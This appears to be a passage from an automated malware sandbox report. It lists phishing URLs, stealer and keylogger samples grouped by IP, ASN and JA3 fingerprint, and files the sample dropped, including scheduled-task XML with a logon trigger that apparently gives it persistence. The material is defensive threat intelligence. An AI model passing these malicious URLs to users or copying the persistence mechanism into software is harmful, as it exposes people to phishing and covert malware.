                                      https://mzansibonds.com/dshk/tmpasdfghjklkjhgfdewertyuioiuytresdxcvbnmnbvfcdsew345678987654rewsdfvgbhnjhbgvfdesw23e45678uijdhgfcsvzbdncqasdcxw.phpGet hashmaliciousHTMLPhisherBrowse
                                      • 104.26.13.205
                                      http://correctingservicesalakks.pages.dev/Get hashmaliciousUnknownBrowse
                                      • 104.26.12.205
                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                      • 104.26.12.205
                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                      • 104.26.12.205
                                      https://lothanse-heracklarne.pages.dev/help/contact/547074160798771Get hashmaliciousHTMLPhisherBrowse
                                      • 104.26.13.205
                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                      • 172.67.74.152
                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                      • 104.26.13.205
                                      ftp.haliza.com.myz38PO_20248099-1_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      • 110.4.45.197
                                      z64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      • 110.4.45.197
                                      rPO_20248099-112,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                                      • 110.4.45.197
                                      PO__20248099-1 12,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                                      • 110.4.45.197

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUSPO.xlsGet hashmaliciousRemcosBrowse
                                      • 104.21.64.88
                                      .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      ATT71725.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 104.17.25.14
                                      https://metapolicyreview.com/Get hashmaliciousUnknownBrowse
                                      • 104.16.79.73
                                      Payment Notification.msgGet hashmaliciousUnknownBrowse
                                      • 104.21.68.220
                                      Aisha C. Yetman shared you a document..msgGet hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.96.3
                                      https://adclick.g.doubleclick.net/pcs/click?xai=AKAOjsulL2bcqZSGb5TVbFOhW-BzJJtb8_QJJBgbE1zqe78Ie8BMxsNyhIFwdKd0pdA90RMhgTdSzkU9EZ9vbhoKh9hWuvNOpIawTAXoH5R0ak3U5rG_o-sZZz3gEiDRvTxtIDu5LY0qOySZABWrjrj9OfeDXHmC1qe7sBrjM2U90kovZKuuD34ZvXQ_OD2Hq--rkZwnu_VhQVAySwVh2ojndP52NUX9X40zwPfUt6TCc4F2rNspoMzray6vSBsFLXUX7nVDHqqILMYBWJr9fSc6AC0-g4meRNvX0rdEgcGztZ5SXk2Zbb1UlFLMFg&sai=AMfl-YQ851Qqa8i013PHKiB6TgTZ-QzfEpO1vcyiniBLSOaNAv3siIC9L9LV3aRq_nbn81w6wFB7OvNqhOdGvo-t7Q&sig=Cg0ArKJSzNuc_g1R_f21EAE&fbs_aeid=&urlfix=1&adurl=https://t.events.caixabank.com/r/?id=h665ab089,6dc7f7ae,f89fd96&p1=d70r46aqireop.cloudfront.net%23QZ~MamRpYXpAZXZlcnNoZWRzLXN1dGhlcmxhbmQuZXM=Get hashmaliciousHTMLPhisherBrowse
                                      • 104.17.25.14
                                      bfINGx7hvL.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.97.3
                                      mSLEwIfTGL.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                      • 172.67.74.152
                                      EXABYTES-AS-APExaBytesNetworkSdnBhdMYz38PO_20248099-1_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      • 110.4.45.197
                                      z64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      • 110.4.45.197
                                      file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                      • 103.6.198.219
                                      PO#005.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 103.6.198.178
                                      purchase order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 103.6.198.178
                                      rPO_20248099-112,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                                      • 110.4.45.197
                                      PO__20248099-1 12,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                                      • 110.4.45.197
                                      https://hijauanhills.com.my/wp-content/upgrade/index.php?uid=qvc-communication@qvcjp.comGet hashmaliciousUnknownBrowse
                                      • 43.252.214.42
                                      https://hijauanhills.com.my/wp-content/upgrade/index.php?uid=qvc-communication@qvcjp.comGet hashmaliciousUnknownBrowse
                                      • 43.252.214.42
                                      https://trk.klclick3.com/ls/click?upn=%75001%2ec09Q0Iaa5JBKaMwLC9cMjFMyHYn-2B6EZxbTX-2FaxXPaGrg5dbeFH4fD3EuQFBIIXLREGZ-2FcOKC34mnxZPxIQx7XghFIqGaXY6alnacloe8xRo-3DgClE_PsKyq3SDuMFd2Bvwnm7-2BcmPfS0aZrbIGf331gXNHUSe-2BhQgqUpFiX3w7h5jUnRd6n-2FE8HERNVnz6BOvKs-2F6ulrBAPhqq4y7BxG-2Bd6kG7tLUxcOuHiFWpTHeDGZUnvDZvP6FM52V2kHQ6WJAZs6KQLxfqZHXfS07MTZdpG9vj-2FyhrEPsl2OqZg5lzEsrvURNsKVvDj6AmF6Sc1Z4lZAW7CGdtCrIGzdnodzXHJg2ktm7ptAUSv125vaGKXpRXhbzmAu5lE-2BvgScXpoVnTswlbot2XqG-2FJI21NuECHLJYOtT13mulLg3LyC43ioSpIwstqzATUDNosl6pb3KNNf3I-2F07dDO2NkZcrZt-2B2G5uraxeQ-3D#/?/c3plbGxAam9uZXNqdW5jdGlvbi5jb20=Get hashmaliciousUnknownBrowse
                                      • 103.6.198.53

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0e.05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 104.26.12.205
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.12.205
                                      https://smallpdf.com/sign-pdf/document#data=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwczovL2VzaWduLnNtYWxscGRmLXN0YWdpbmcuY29tIiwic3ViIjoiNjE3MmQyMzMtODcyNy00M2NhLWI1NjQtYjgwZDUyZjYxYmVjIiwiYXVkIjpbImVzaWduIl0sImV4cCI6MTcyODYzODEyMCwibmJmIjoxNzI3NDI4NTIwLCJpYXQiOjE3Mjc0Mjg1MjAsImp0aSI6IjYxNzJkMjMzLTg3MjctNDNjYS1iNTY0LWI4MGQ1MmY2MWJlYyIsInBheWxvYWQiOnsiZW52ZWxvcGVfaWQiOiI2ZWRlMzFjZS00Mzc2LTQwYzItYjJjNy1jMDc2Y2M3MjY4NjIiLCJzaWduX3JlcXVlc3RfaWQiOiI2MTcyZDIzMy04NzI3LTQzY2EtYjU2NC1iODBkNTJmNjFiZWMiLCJ0b2tlbl90eXBlIjoibm90aWZpY2F0aW9uIiwidXNlcl9lbWFpbCI6ImNoYW8ud3VAd3JpLm9yZyIsInVzZXJfZmlyc3RuYW1lIjoiY2hhby53dUB3cmkub3JnIiwidXNlcl9sYXN0bmFtZSI6ImNoYW8ud3VAd3JpLm9yZyJ9fQ.UX67GiHBKgjV8XyH-SFTt_KgB2I_q2j9cbGTSqbzRvY&eid=6ede31ce-4376-40c2-b2c7-c076cc726862&esrt=6172d233-8727-43ca-b564-b80d52f61becGet hashmaliciousUnknownBrowse
                                      • 104.26.12.205
                                      8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                                      • 104.26.12.205
                                      GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 104.26.12.205
                                      GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 104.26.12.205
                                      1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 104.26.12.205
                                      Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.26.12.205
                                      RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                      • 104.26.12.205
                                      RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                      • 104.26.12.205

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pBBqGOzrz.exe.log

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rQuotation3200025006.exe.log

                                      Download File
                                      Process:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:true
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sgxIb.exe.log

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2232
                                      Entropy (8bit):5.380805901110357
                                      Encrypted:false
                                      SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z+Uyus:lGLHyIFKL3IZ2KRH9OugIs
                                      MD5:BB0D009D716C19EF3E3D871F7E5615A7
                                      SHA1:24A3A9549BBF1704F44604631DF92D78D48ED3B5
                                      SHA-256:CAD65E7B83D76910680E43406ED1EEF6BB6CDC27ED79E3462EDD5F90CFD37F05
                                      SHA-512:D3159537188A4AE3F51CA245E63DAFDFA286D6172573847371382F84A4B5F819730B03F4A541BBEAAC022F20F283B92127C526A675FEB1D33636FF17CBDD0C17
                                      Malicious:false
                                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5yxvmcso.vcw.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvroevrq.yjr.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ef5osgc1.1rh.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2mf5iym.s1p.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmntbso3.xpb.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnualhbp.jmy.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu1bd2vm.grk.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5d5d3d2.qtb.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                                      File Type:XML 1.0 document, ASCII text
                                      Category:dropped
                                      Size (bytes):1575
                                      Entropy (8bit):5.11956975542299
                                      Encrypted:false
                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTZv
                                      MD5:0BC1179F57AA1484371BB1B435F4BD7D
                                      SHA1:CB4BE3E603D898E3F1839E3C1FCBFC5E1F90107F
                                      SHA-256:C1F88BCE4E2860F745C5F16ED6C6E97F8B3BB651A8EE4BBFB37FC2B558A1EDC5
                                      SHA-512:A56D005FCCC977E55701CDEA3B88DF0AC337420BFA3CFCB7F016149CA70C0A7EEFEAE9A8E499D1C14D005163E9BC6BB783E093D73B7673687DCDC68DFD84BC9A
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                      C:\Users\user\AppData\Local\Temp\tmp3D2.tmp

                                      Download File
                                      Process:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      File Type:XML 1.0 document, ASCII text
                                      Category:dropped
                                      Size (bytes):1575
                                      Entropy (8bit):5.11956975542299
                                      Encrypted:false
                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTZv
                                      MD5:0BC1179F57AA1484371BB1B435F4BD7D
                                      SHA1:CB4BE3E603D898E3F1839E3C1FCBFC5E1F90107F
                                      SHA-256:C1F88BCE4E2860F745C5F16ED6C6E97F8B3BB651A8EE4BBFB37FC2B558A1EDC5
                                      SHA-512:A56D005FCCC977E55701CDEA3B88DF0AC337420BFA3CFCB7F016149CA70C0A7EEFEAE9A8E499D1C14D005163E9BC6BB783E093D73B7673687DCDC68DFD84BC9A
                                      Malicious:true
                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                      C:\Users\user\AppData\Local\Temp\tmp4705.tmp

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      File Type:XML 1.0 document, ASCII text
                                      Category:dropped
                                      Size (bytes):1575
                                      Entropy (8bit):5.11956975542299
                                      Encrypted:false
                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTZv
                                      MD5:0BC1179F57AA1484371BB1B435F4BD7D
                                      SHA1:CB4BE3E603D898E3F1839E3C1FCBFC5E1F90107F
                                      SHA-256:C1F88BCE4E2860F745C5F16ED6C6E97F8B3BB651A8EE4BBFB37FC2B558A1EDC5
                                      SHA-512:A56D005FCCC977E55701CDEA3B88DF0AC337420BFA3CFCB7F016149CA70C0A7EEFEAE9A8E499D1C14D005163E9BC6BB783E093D73B7673687DCDC68DFD84BC9A
                                      Malicious:false
